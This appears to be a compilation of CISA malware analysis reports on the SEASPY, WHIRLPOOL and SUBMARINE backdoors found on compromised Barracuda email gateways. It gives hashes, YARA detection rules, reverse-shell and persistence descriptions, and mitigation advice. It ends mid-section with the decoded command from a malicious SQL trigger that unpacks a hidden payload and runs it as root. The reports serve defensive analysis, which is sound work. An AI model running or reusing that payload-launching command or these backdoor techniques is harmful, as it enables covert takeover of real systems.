This artifact is a 64-bit Executable and Linkable Format (ELF) file that has been identified as a "SEASPY" malware variant installed as a system service. The malware is a persistent backdoor that masquerades as a legitimate Barracuda Networks service. The malware is designed to listen to commands received from the Threat Actor's (TA's) C2 through TCP packets. When executed, the malware uses libpcap sniffer to monitor traffic for a magic packet on TCP port 25 (Simple Mail Transfer Protocol (SMTP)) and TCP port 587. It checks the network packet captured for a hard-coded string "oXmp". When the right sequence of packets is captured, it establishes a TCP reverse shell to the TA's C2 server for further exploitation. This allows the TA to execute arbitrary commands on the compromised system.

The malware is based on an open-source backdoor program named "cd00r" and it is executed using the parameter below:

--Begin argument--
Usage: "./BarracudaMailService "
Sample: "./ eth0"
--End argument--

29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b

Details

-->

Name QuoVadis_Root_CA_1_G3.pem
Size 2698 bytes
Type POSIX shell script, ASCII text executable
MD5 2d841cb153bebcfdee5c54472b017af2
SHA1 7a791d4d7e55d7a2fdc08ac0f22ab7ae068fdf26
SHA256 29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b
SHA512 021c28dfd1a4136a6aa80fb86546655f4b0b8a9c528af157edc556074922553d58fa793b061a18316783b8b74eb38d3e08c5ece4eecc8fa4953ac0a556595cca
ssdeep 48:2LrIlobkq9g03Xxk7OnoDzHyvIoXirAAAt6KWejvPqRvOojmJL0pNZiWtDjE5:2Lzbhg0nusoH2IoXirArMgqVmJL0pNZw
Entropy 5.234290
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_10 : trojan persists_after_system_reboot
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-20"
           Last_Modified = "20230726_1700"
           Actor = "n/a"
           Family = "n/a"
           Capabilities = "persists-after-system-reboot"
           Malware_Type = "trojan"
           Tool_Type = "unknown"
           Description = "Detects script samples known to start SEASPY after reboot"
           SHA256 = "29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b"
       strings:
           $s1 = { 21 20 2d 64 20 24 7b 72 63 5f 62 61 73 65 7d 2f 72 63 24 7b 72 75 6e 6c 65 76 65 6c 7d 2e 64 }
           $s2 = { 52 75 6e 6e 69 6e 67 20 73 63 72 69 70 74 73 20 66 6f 72 20 72 75 6e 6c 65 76 65 6c 20 24 72 75 6e 6c 65 76 65 6c }
           $s3 = { 5b 20 2d 66 20 24 7b 70 72 65 76 5f 73 74 61 72 74 7d 20 5d 20 26 26 20 5b 20 21 20 2d 66 20 24 7b 73 74 6f 70 7d 20 5d 20 26 26 20 63 6f 6e 74 69 6e 75 65 }
           $s4 = { 24 7b 69 7d 20 73 74 61 72 74 20 3e 3e 2f 72 6f 6f 74 2f 62 6f 6f 74 2e 6c 6f 67 20 32 3e 3e 2f 72 6f 6f 74 2f 62 6f 6f 74 2e 6c 6f 67 }
           $s5 = { 2f 73 62 69 6e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
29a41174eb... Related_To 3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115
Description

This artifact is an initialization script. Upon its execution it sets terminal settings to default using the 'stty sane' command. It then runs through the process of setting a runlevel variable and stops other services that were started by a previous runlevel. It also kills any services that are running on the current runlevel. Next, the script will start its associated services at the current runlevel. After logging functionalities are started, the script will then check if the runlevel is 3, which will result in the terminal screen being cleared using /usr/bin/clear. Finally, the script contains the command “/sbin/BarracudaMailService eth0” at the end. BarracudaMailService will be started automatically when the initialization script is run on the network interface eth0. BarracudaMailService is a known name for the SEASPY backdoor.

Screenshots
AR23-221A FIGURE 1

 

 

 

 

 

 

 

Figure 1. - At the end of the script the string "/sbin/BarracudaMailService eth0" is specified.

9bb7addd96f99a29658aca9800b66046823c5ef0755e29012983db6f06a999cf

Tags

trojan

Details

-->

Name resize_reisertab
Size 2549176 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=c971d01d9faa9d7fd94aef13b24e0b5d3d149a7c, stripped
MD5 45b79949276c9cb9cf5dc72597dc1006
SHA1 191e16b564c66b3db67f837e1dc5eac98ff9b9ef
SHA256 9bb7addd96f99a29658aca9800b66046823c5ef0755e29012983db6f06a999cf
SHA512 0f4307b5f48c193c1036b56b3cf569f79cb8fc2306f8f796d5548bcd5a96fc52127d2186d980c71d5917eb6d6026e92405a3cd453011503515e2e4f3311201c3
ssdeep 49152:4TnrmLlCGFyVfj+QCH2qirsZZrnYgBbfhceT+c02:KnrXxj317rs/NocJ
Entropy 6.227206
Malware Result unknown
Antivirus
AhnLab Trojan/Linux.SeaSpy.2549176
Antiy Trojan/Linux.SeaSpy.a
Bitdefender Trojan.Linux.Generic.298117
Emsisoft Trojan.Linux.Generic.298117 (B)
ESET a variant of Linux/SeaSpy.A trojan
IKARUS Trojan.Linux.Seaspy
Varist E64/SeaSpy.A
YARA Rules
  • rule CISA_10452108_01 : SEASPY backdoor communicates_with_c2 installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-20"
           Last_Modified = "20230628_1000"
           Actor = "n/a"
           Family = "SEASPY"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           Description = "Detects malicious Linux SEASPY samples"
           SHA256_1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
           SHA256_2 = "69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192"
           SHA256_3 = "5f5b8cc4d297c8d46a26732ae47c6ac80338b7be97a078a8e1b6eefd1120a5e5"
           SHA256_4 = "10efa7fe69e43c189033006010611e84394569571c4f08ea1735073d6433be81"
       strings:
           $s0 = { 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30 }
           $s1 = { 75 73 61 67 65 3a 20 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6C 53 65 72 76 69 63 65 20 3c 4e 65 74 77 6f 72 6b 2d 49 6e 74 65 72 66 61 63 65 }
           $s2 = { 65 6e 74 65 72 20 6f 70 65 6e 20 74 74 79 20 73 68 65 6c 6c }
           $s3 = { 25 64 00 4e 4f 20 70 6f 72 74 20 63 6f 64 65 }
           $s4 = { 70 63 61 70 5f 6c 6f 6f 6b 75 70 6e 65 74 3a 20 25 73 }
           $s5 = { 43 68 69 6c 64 20 70 72 6f 63 65 73 73 20 69 64 3a 25 64 }
           $s6 = { 5b 2a 5d 53 75 63 63 65 73 73 21 }
           $a7 = { bf 90 47 90 ec 18 fe e3 83 e2 a9 f7 8d 85 18 1d }
           $a8 = { 81 35 1e f0 94 ab 2a ba 5d f0 37 76 69 19 9f 1e }
           $a9 = { 6a 8e c7 89 ce c1 fe 64 78 a6 e1 c5 fe 03 d1 a7 }
           $a10 = { c2 ff d1 0d 24 23 ec c0 57 f9 8d 4b 05 34 41 b8 }
       condition:
           uint32(0) == 0x464c457f and (all of ($s*)) or ( all of ($a*))
    }
ssdeep Matches

No matches found.

Description

This artifact is a 64-bit ELF file that has been identified as a "SEASPY" malware variant installed as a system service. This variant of SEASPY has had its symbols stripped. The malware is a persistent backdoor that masquerades as a legitimate Barracuda Networks service. The malware is designed to listen to commands received from the TA's C2 through TCP packets.

When executed, the malware uses libpcap sniffer to monitor traffic for a magic packet on TCP port 25 (SMTP) and TCP port 587. It checks the network packet captured for a hard-coded string "TfuZ". When the right sequence of packets is captured this SEASPY variant launches an authentication sequence prior to launching the reverse shell. Once the TA authenticates, the malware starts a reverse shell on the infected system. This allows the TA to execute arbitrary commands on the compromised system.

The malware is based on an open-source backdoor program named "cd00r" and it is executed using the parameter below:

--Begin argument--
Usage: "./BarracudaMailService "
Sample: "./ eth0"
--End argument--

83ca636253fd1eb898b244855838e2281f257bbe8ead428b69528fc50b60ae9c

Tags

trojan

Details

-->

Name rverify
Size 2646516 bytes
Type ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=fb2cdec59a77c255bd422c92e5de2d0f3f19bd6c, with debug_info, not stripped
MD5 85c5b6c408e4bdb87da6764a75008adf
SHA1 5ce46efc6b28bd94955138833dc97916957dbde1
SHA256 83ca636253fd1eb898b244855838e2281f257bbe8ead428b69528fc50b60ae9c
SHA512 4aef99afc89062387b4987d49e5128ae37a3c25b59f05ccf324e593c67a8f5bd96e1f883d77225dbd0cc9456d736c90dd890bbead6082a14ae9f06abf07f87d8
ssdeep 49152:FKuknP+5ada3TUFChbGh7eMKPEGqnVoqqEoLC+2U:tkP+M834FChbGh7rE2+2U
Entropy 6.540106
Malware Result unknown
Antivirus
Adaware Unavailable (production)
AhnLab Trojan/Linux.Whirpool.2646516
Antiy Trojan/Linux.Agent.wl
Avira LINUX/Agent.shpuf
Bitdefender Trojan.Linux.Generic.298125
Emsisoft Trojan.Linux.Generic.298125 (B)
ESET a variant of Linux/WhirlPool.A trojan
IKARUS Trojan.Linux.Agent
McAfee Trojan-FVEB!85C5B6C408E4
Sophos Linux/Agnt-BS
Varist E32/Agent.HC
YARA Rules
  • rule CISA_10452108_02 : WHIRLPOOL backdoor communicates_with_c2 installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-20"
           Last_Modified = "20230804_1730"
           Actor = "n/a"
           Family = "WHIRLPOOL"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           Description = "Detects malicious Linux WHIRLPOOL samples"
           SHA256_1 = "83ca636253fd1eb898b244855838e2281f257bbe8ead428b69528fc50b60ae9c"
           SHA256_2 = "8849a3273e0362c45b4928375d196714224ec22cb1d2df5d029bf57349860347"
       strings:
           $s0 = { 65 72 72 6f 72 20 2d 31 20 65 78 69 74 }
           $s1 = { 63 72 65 61 74 65 20 73 6f 63 6b 65 74 20 65 72 72 6f 72 3a 20 25 73 28 65 72 72 6f 72 3a 20 25 64 29 }
           $s2 = { c7 00 20 32 3e 26 66 c7 40 04 31 00 }
           $a3 = { 70 6c 61 69 6e 5f 63 6f 6e 6e 65 63 74 }
           $a4 = { 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 3a 20 25 73 28 65 72 72 6f 72 3a 20 25 64 29 }
           $a5 = { 73 73 6c 5f 63 6f 6e 6e 65 63 74 }
       condition:
           uint32(0) == 0x464c457f and 4 of them
    }
ssdeep Matches

No matches found.

Description

This artifact is a 32-bit ELF file that has been identified as a malware variant named "WHIRLPOOL". The malware takes two arguments (C2 IP and port number) from a module to establish a Transport Layer Security (TLS) reverse shell. The module that passes the arguments was not available for analysis.

Relationship Summary

3f26a13f02... Related_To 29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b
29a41174eb... Related_To 3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

July 28, 2023

MAR-10454006-r2.v1 SEASPY Backdoor | CISA

  

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA obtained two SEASPY malware samples. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).

SEASPY is a persistent and passive backdoor that masquerades as a legitimate Barracuda service “BarracudaMailService” that allows the threat actors to execute arbitrary commands on the ESG appliance.

For information about related malware, specifically information on the initial exploit payload and other backdoors, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors.

Download the PDF version of this report:

AR23-209B PDF (PDF, 354.36 KB )

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-209B JSON (JSON, 19.83 KB )
Submitted Files (2)

3e21e547cf94cb07c010fe82d6965e5bd52dbdd9255b4dd164f64addfaa87abb (BarracudaMailService.1)

69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192 (6931018-BarracudaMailService.2)

Findings

69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192

Tags

trojan

Details

-->

Name 6931018-BarracudaMailService.2
Size 2924089 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=495062eaa63784dad0a098d58892f58deb47ea66, with debug_info, not stripped
MD5 5d6cba7909980a7b424b133fbac634ac
SHA1 d114a707fc6abbd8060f821893a9ee64dc3b2714
SHA256 69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192
SHA512 ef966e1d679daa44ee4c86848b71a0be27a79c8824eba8e74c866322e59a8bdce66b32f3d4417256af351f87dd149a73ed7e8e40df5794c5273cf029d04b6f25
ssdeep 49152:IaMq45lHsbhe9YBU80A3hvJeD7ANjQ4maMTFhmwzHPm0WhphC:oqJh4YWkLeDKOhmwa0WhphC
Entropy 6.165718
Malware Result unknown
Antivirus
ESET a variant of Linux/SeaSpy.A trojan
McAfee Linux/Seaspy!5D6CBA790998
YARA Rules
  • rule CISA_10452108_01 : SEASPY backdoor communicates_with_c2 installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-20"
           Last_Modified = "20230628_1000"
           Actor = "n/a"
           Family = "SEASPY"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           Description = "Detects malicious Linux SEASPY samples"
           SHA256_1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
           SHA256_2 = "69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192"
           SHA256_3 = "5f5b8cc4d297c8d46a26732ae47c6ac80338b7be97a078a8e1b6eefd1120a5e5"
           SHA256_4 = "10efa7fe69e43c189033006010611e84394569571c4f08ea1735073d6433be81"
       strings:
           $s0 = { 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30 }
           $s1 = { 75 73 61 67 65 3a 20 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6C 53 65 72 76 69 63 65 20 3c 4e 65 74 77 6f 72 6b 2d 49 6e 74 65 72 66 61 63 65 }
           $s2 = { 65 6e 74 65 72 20 6f 70 65 6e 20 74 74 79 20 73 68 65 6c 6c }
           $s3 = { 25 64 00 4e 4f 20 70 6f 72 74 20 63 6f 64 65 }
           $s4 = { 70 63 61 70 5f 6c 6f 6f 6b 75 70 6e 65 74 3a 20 25 73 }
           $s5 = { 43 68 69 6c 64 20 70 72 6f 63 65 73 73 20 69 64 3a 25 64 }
           $s6 = { 5b 2a 5d 53 75 63 63 65 73 73 21 }
           $a7 = { bf 90 47 90 ec 18 fe e3 83 e2 a9 f7 8d 85 18 1d }
           $a8 = { 81 35 1e f0 94 ab 2a ba 5d f0 37 76 69 19 9f 1e }
           $a9 = { 6a 8e c7 89 ce c1 fe 64 78 a6 e1 c5 fe 03 d1 a7 }
           $a10 = { c2 ff d1 0d 24 23 ec c0 57 f9 8d 4b 05 34 41 b8 }
       condition:
           uint32(0) == 0x464c457f and (all of ($s*)) or ( all of ($a*))
    }
ssdeep Matches

No matches found.

Description

This artifact is a 64-bit ELF file that has been identified as a "SEASPY" malware variant installed as a system service. The sample is a persistent backdoor that masquerades as a legitimate Barracuda Networks service. The malware is designed to listen to commands received from the Threat Actor’s (TA) Command-and-Control (C2) through Transmission Control Protocol (TCP) packets. When executed, the malware uses libpcap sniffer to monitor traffic for a magic packet on TCP port 25 (SMTP) and TCP port 587. It checks the network packet captured for a hard-coded string "oXmp". Note: This hard-coded string may change for other SEASPY variants. When the right sequence of packet is captured, it establishes a TCP reverse shell to the TA's C2 server for further exploitation. This allows the TA to execute arbitrary commands on the compromised system.

The malware is based on an open-source backdoor program named "cd00r" and it is executed using the parameter below:

--Begin argument—
Usage: "./BarracudaMailService "
Sample: "./ eth0"
--End argument—

Screenshots
Figure 1

Figure 1. - This is disassembler output showing how the malware checks the parameters that the malware was executed with.

3e21e547cf94cb07c010fe82d6965e5bd52dbdd9255b4dd164f64addfaa87abb

Tags

trojan

Details

-->

Name BarracudaMailService.1
Size 2924089 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=41942e680be29136ce7f1cdc9a15fd43968b0db0, with debug_info, not stripped
MD5 32ffe48d1a8ced49c53033eb65eff6f3
SHA1 2c7ad0e7897f348bec2e32f2af4282bd65916f8d
SHA256 3e21e547cf94cb07c010fe82d6965e5bd52dbdd9255b4dd164f64addfaa87abb
SHA512 12fd230c78c9e14b1bbb7f3c6776a14710693fa4224b4376775f118fc35584a5946a57dda43db20bd9ffc2950f4e62e8c206506744bca5fe39e6cb9a1a91b981
ssdeep 49152:bgt0bmh2EXaRuFmK3cnlBceICm4ewQ/MTs/dgPm0WhphC:Ma0gug7bceI4ih/dp0WhphC
Entropy 6.165197
Malware Result unknown
Antivirus
ESET a variant of Linux/SeaSpy.A trojan
McAfee Linux/Seaspy!32FFE48D1A8C
YARA Rules
  • rule CISA_10452108_01 : SEASPY backdoor communicates_with_c2 installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-20"
           Last_Modified = "20230628_1000"
           Actor = "n/a"
           Family = "SEASPY"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           Description = "Detects malicious Linux SEASPY samples"
           SHA256_1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
           SHA256_2 = "69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192"
           SHA256_3 = "5f5b8cc4d297c8d46a26732ae47c6ac80338b7be97a078a8e1b6eefd1120a5e5"
           SHA256_4 = "10efa7fe69e43c189033006010611e84394569571c4f08ea1735073d6433be81"
       strings:
           $s0 = { 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30 }
           $s1 = { 75 73 61 67 65 3a 20 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6C 53 65 72 76 69 63 65 20 3c 4e 65 74 77 6f 72 6b 2d 49 6e 74 65 72 66 61 63 65 }
           $s2 = { 65 6e 74 65 72 20 6f 70 65 6e 20 74 74 79 20 73 68 65 6c 6c }
           $s3 = { 25 64 00 4e 4f 20 70 6f 72 74 20 63 6f 64 65 }
           $s4 = { 70 63 61 70 5f 6c 6f 6f 6b 75 70 6e 65 74 3a 20 25 73 }
           $s5 = { 43 68 69 6c 64 20 70 72 6f 63 65 73 73 20 69 64 3a 25 64 }
           $s6 = { 5b 2a 5d 53 75 63 63 65 73 73 21 }
           $a7 = { bf 90 47 90 ec 18 fe e3 83 e2 a9 f7 8d 85 18 1d }
           $a8 = { 81 35 1e f0 94 ab 2a ba 5d f0 37 76 69 19 9f 1e }
           $a9 = { 6a 8e c7 89 ce c1 fe 64 78 a6 e1 c5 fe 03 d1 a7 }
           $a10 = { c2 ff d1 0d 24 23 ec c0 57 f9 8d 4b 05 34 41 b8 }
       condition:
           uint32(0) == 0x464c457f and (all of ($s*)) or ( all of ($a*))
    }
ssdeep Matches

No matches found.

Description

This artifact is a 64-bit ELF file that has been identified as a "SEASPY" malware variant installed as a system service. This sample has the sample malicious capabilities as BarracudaMailService.2 (5d6cba7909980a7b424b133fbac634ac). The only difference between the binaries is located in the function named "start_pcap_listener". In the function "start_pcap_listener" both binaries call a function named "reverse shell" to start the reverse shell functionality of the malware. The difference is that BarracudaMailService.1 (32ffe48d1a8ced49c53033eb65eff6f3) jumps directly to the set of instructions that start the reverse shell, as opposed to BarracudaMailService.2 (5d6cba7909980a7b424b133fbac634ac), which contains an extra set of instructions before jumping to the instructions that start the reverse shell.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Acknowledgments

Mandiant contributed to this report.

 
July 28, 2023

MAR-10454006-r1.v2 SUBMARINE Backdoor | CISA

  

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA obtained seven malware samples related to a novel backdoor CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting certain versions 5.1.3.001 - 9.2.0.006 of Barracuda Email Security Gateway (ESG).

SUBMARINE is a novel persistent backdoor that lives in a Structured Query Language (SQL) database on the ESG appliance. SUBMARINE comprises multiple artifacts that, in a multi-step process, enable execution with root privileges, persistence, command and control, and cleanup. In addition to SUBMARINE, CISA obtained associated Multipurpose Internet Mail Extensions (MIME) attachment files from the victim. These files contained the contents of the compromised SQL database, which included sensitive information.

For information about related malware, specifically information on the initial exploit payload and other backdoors, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors.

Download the PDF version of this report:

AR23-209A PDF (PDF, 1.18 MB )

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-209A JSON (JSON, 48.51 KB )
Submitted Files (5)

6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0 (r)

81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab (libutil.so)

8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239 (machineecho_-n_Y2htb2QgK3ggL3J...)

b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43 (sedO4CWZ9)

cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a (smtpctl)

Additional Files (2)

2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5 (config.TRG)

bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a (run.sh)

Findings

2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5

Details

-->

Name config.TRG
Size 5465 bytes
Type ASCII text, with very long lines
MD5 d03e1f112f0c784a39003e0b3992ad80
SHA1 447369281ba26b7a6da4f659aa31026605aa3c6f
SHA256 2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5
SHA512 aead33a656f647d58da0a7f5240eb8cd7c0121c9ea33ae6504687b5faf21779e67b659a93987392033ea8ae2aae239e432444dcddad52f2a8665add7265902f6
ssdeep 96:CjXDCc0wSWbCZgFHwlJc8UpsmdpanoP5Mc8wWuMdHABIz2mN:CjXDN0wSWQp08UpsmFm4mhCm
Entropy 6.062477
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_06 : SUBMARINE trojan backdoor cleans_traces_of_infection hides_artifacts installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-11"
           Last_Modified = "20230727_1200"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "cleans-traces-of-infection hides-artifacts installs-other-components"
           Malware_Type = "trojan backdoor"
           Tool_Type = "unknown"
           Description = "Detects SUBMARINE SQL trigger samples"
           SHA256_1 = "2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5"
       strings:
           $s1 = { 54 52 49 47 47 45 52 }
           $s2 = { 43 52 45 41 54 45 }
           $s3 = { 53 45 4c 45 43 54 20 22 65 63 68 6f 20 2d 6e }
           $s4 = { 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }
           $s5 = { 72 6f 6f 74 }
           $s6 = { 53 45 54 }
           $s7 = { 45 4e 44 20 49 46 3b }
           $s8 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 43 33 42 55 }
           $s9 = { 2f 76 61 72 2f 74 6d 70 2f 72 }
           $s10 = { 2f 72 6f 6f 74 2f 6d 61 63 68 69 6e 65 }
       condition:
       filesize }
ssdeep Matches

No matches found.

Description

The file 'config.TRG' is a SUBMARINE artifact. The presence of the filename, 'config.TRG' does not indicate that the ESG is infected. Instead, it is the actual contents of the file that determine whether it is infected or not. The contents of 'config.TRG' is contained within the SQL database file called 'config.snapshot' and the MIME attachments. Presence of the contents of the file 'config.TRG' within the SQL database is indicative of an infection of SUBMARINE.

The file contains a malicious SQL trigger called ‘cuda_trigger’ (Figure 1). This SQL trigger is set to run as root on the local host before a row is deleted from the database. After the trigger parameters are met, two actions occur. First a compressed, base64 encoded blob containing 2 files is written into a file called ‘r’ in the ‘/var/tmp’ directory (Figure 2). Second, a base64 encoded command is executed (Figure 3).

--Begin Base64 Decoded Command--
cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp
nohup bash /var/tmp/run.sh >/dev/null 2>&1 &
rm -f /root/machine` *chmod +x /root/mac*
sh /root/mach*`*
